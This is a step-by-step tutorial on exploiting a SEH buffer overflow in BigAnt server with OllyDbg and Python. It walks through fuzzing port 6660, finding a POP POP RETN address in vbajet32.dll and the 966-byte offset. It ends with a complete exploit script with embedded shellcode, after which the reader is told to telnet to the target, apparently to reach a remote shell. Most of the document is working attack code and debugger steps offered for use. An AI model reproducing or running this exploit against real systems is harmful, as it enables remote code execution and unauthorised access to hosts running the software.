Structure Exception Handling (SEH) is a mechanism that is owned by a software and hardware to handle an exception.
Ok, let's begin
1. Install BigAnt server and Ollydbg in windows
Run BigAnt server and open Ollydbg then attach Antserver
2. Next, prepare the fuzzer to attack bigant server
#!/usr/bin/python
import socket
target_address="192.168.43.128"
target_port=6660
#buffer= "USV " + "\x41" * 2500 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
3. Run the fuxzzer and look at ollydbg
Application has crashed, we successfully send the trash
then to continue into memory press shift + F9
EIP values changed to 41414141
To see the data that are in memory of the application, right-click on the row stack > Follow in Dump,
so at the memory dump window will appear in the data buffer in memory.
There are several ways to solve the protection seh, and the most popular is POP, POP, RETN metode.
*you can find and learn that metode in other articles.
4. Then looking for springboard address
We are looking for an address with saved commands pop, pop, retn where that address will be used to overwrite SEH address at application.
I will be looking for the address of the module that is not compiled using the option/safeSEH and IMAGE_DLLCHARACTERISTICS_NO_SEH.
*you can check it using the msfpescan function on backtrack
In here I use vbajet32.dll
From Ollydbg - View - Excecutable Modules, double-click vbajet32.dll
after getting into CPU from vbajet32.dll then right-click - Search For - Sequence of Command
and type POP r32, POP r32, RETN like picture below
we find the address of vbajet32.dll , that is at the offset 0F9A196A.
5. Looking for offset to overwrite SEH
I try to make pattern as much as 2500 byte and add this to fuzzer
After add that pattern to fuzzer then run the fuzzer and see on Ollydbg
*every time you run a fuzzer, we need to restart OllyDbg and BigAnt
press shift + F9 to bypass SEH, so will be displayed like below
record the value from register EIP and check that using pattern_offset.
The conclusion we need 966 byte order to triggers SEH handler.
change the value of fuzzer to be 966 byte.
buffer= "USV "
buffer+= "\x90" * 962
buffer+= "\xcc\xcc\xcc\xcc"
buffer+= "\x41\x41\x41\x41"
buffer+= "\x90" * (2504 - len(buffer))
buffer+= "\r\n\r\n"
In here I will change the four byte buffer to be \xcc before the buffer reaches seh address, which will be overwritten with the value \ x41.
Restart the Ollydbg and bigant server then run the fuzzer once again.
bypass SEH by press shift + F9
buffer value \x41 successfully entered into the SEH handler. So far everything is going according to expectations.
6. Control the CPU
Add the address of vbajet32.dll (0F9A196A) to buffer and set to little endian format
buffer= "USV "
buffer+= "\x90" * 962
buffer+= "\xcc\xcc\xcc\xcc"
buffer+= "\x6A\x19\x9A\x0f" ==> EIP value written in little endian format
buffer+= "\x90" * (2504 - len(buffer))
buffer+= "\r\n\r\n"
Before run the fuzzer, breakpoint at the SEH address memory.
Restart the Ollydbg and bigant server then run the fuzzer once again.
Process on break right when will access the seh address. Then press shift + F9
looking for space to save the payload.
Right-click on the first address - Follow in Dump - Selection
There are a lot of very large empty address. To direct to the address of the stack required jump of 6 bytes.
Then create shellcode and avoid bad character.
*You can see in the book HARMLESS HACKING author MADA R. PERDANA or other articles.
Finall fuzzer
#!/usr/bin/python
import socket
target_address="192.168.43.128"
target_port=6660
buffer= "USV "
buffer+= "\x90" * 962
buffer+= "\xeb\x06\x90\x90" #JMP SHORT 6, nop pading
buffer+= "\x6A\x19\x9A\x0f" #SEH overwrite
buffer+= "\x90" * 16 #NOP pading before shellcode
buffer+= ("\xda\xd6\xd9\x74\x24\xf4\xbb\xc7\xa4\xea\x06\x33\xc9\xb1\x51\x5f"
"\x31\x5f\x17\x83\xc7\x04\x03\x98\xb7\x08\xf3\xda\xd2\x27\xb1\xca"
"\xda\x47\xb5\xf5\x7d\x33\x26\x2d\x5a\xc8\xf2\x11\x29\xb2\xf9\x11"
"\x2c\xa4\x89\xae\x36\xb1\xd1\x10\x46\x2e\xa4\xdb\x7c\x3b\x36\x35"
"\x4d\xfb\xa0\x65\x2a\x3b\xa6\x72\xf2\x76\x4a\x7d\x36\x6d\xa1\x46"
"\xe2\x56\x62\xcd\xef\x1c\x2d\x09\xf1\xc9\xb4\xda\xfd\x46\xb2\x83"
"\xe1\x59\x2f\x38\x36\xd1\x26\x52\x62\xf9\x59\x69\x5b\xda\xfe\xe6"
"\xdf\xec\x75\xb8\xd3\x87\xfa\x24\x41\x1c\xba\x5c\xc7\x4b\xb5\x12"
"\xf9\x67\x99\x55\xd3\x1e\x49\xcf\xb4\xed\x5f\x67\x32\x61\x92\x28"
"\xe8\x7a\x02\xbe\xdb\x68\x5f\x05\x8c\x8d\x76\x26\xa5\x97\x11\x59"
"\x58\x5f\xdc\x0c\xc9\x62\x1f\x7e\x65\xba\xd6\x8b\xdb\x6b\x16\xa5"
"\x77\xc7\xbb\x1a\x2b\xa4\x68\xdf\x98\xd5\x5f\xb9\x76\x3b\x3c\x23"
"\xd4\xb2\x5d\x3e\xb2\x60\x87\x30\x84\x3e\x47\x66\x60\xd1\xe6\xd3"
"\x8a\x01\x60\x7f\xd9\x8c\x98\x28\xdd\x07\x09\x83\xde\x78\xc6\xce"
"\x68\xff\x5e\x47\x94\x29\x30\x33\x3e\x83\x4e\x6b\x2d\x43\x56\xf2"
"\x94\xed\xcf\xfb\xcf\x5b\x0f\xd3\x96\x09\x8b\xb5\x3e\xad\x3e\xb0"
"\x5a\x5b\x91\x9b\x8d\x50\x98\xfc\xa4\x2c\x12\xe0\x08\x6d\xd7\x4e"
"\x94\x2f\x35\x70\x2b\x9c\xd6\x01\xd6\xe4\x73\xb2\x8c\x7d\xf6\x3a"
"\x61\x6b\x09\xb7\xc2\x6b\x23\x6c\x9c\xc1\x9d\xc3\x73\x8c\x1c\xb2"
"\x22\x05\x4e\xcb\x15\xcd\xdd\xea\x93\xc0\x4d\xf3\x4a\xb6\x8e\xf4"
"\x44\xb8\xa1\x81\xfc\xba\xc1\x51\x66\xbc\x10\x0b\x98\x92\xf5\xd5"
"\xbe\xf1\x75\x7a\xc0\x20\x86\xac")
buffer+= "\x90" * (2504 - len(buffer))
buffer+= "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
Run BigAnt server without Ollydbg, run the fuzzer then telnet ip target.
CMIIW
